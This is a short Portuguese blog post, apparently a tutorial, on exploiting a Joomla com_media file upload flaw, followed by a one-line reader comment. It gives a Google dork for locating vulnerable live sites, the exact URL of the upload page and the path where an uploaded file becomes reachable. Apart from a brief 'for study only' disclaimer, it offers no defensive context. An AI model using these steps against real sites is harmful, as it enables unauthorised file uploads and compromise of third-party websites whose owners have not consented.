Fala pessoal, tudo bem?
Hoje eu trago um tutorial de como explorar a falha Joomla com_media Remote File Upload Vulnerability.
Primeiro usamos a dork para procurar no Google, sites com essa vulnerabilidade
inurl:index.php?option=com_media
Você pode especificar sua busca utilizando as demais dorks do Google Hacking.
A URL ficará assim:
https://site.com.br/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author=
Agora você pode fazer upload de algum arquivo. Depois basta acessar a URL do seu arquivo, que ficará mais ou menos assim:
https://site.com.br/images/arquivo.txt
Alguns sites já arrumaram parte desta falha, mas não por completa.
É isso pessoal, qualquer dúvida só deixar seu comentário! Obrigado! 😀
Esta postagem foi feita para fins de estudo, saiba que fazer mal uso desta falha é crime.
Very good combination of information, thank you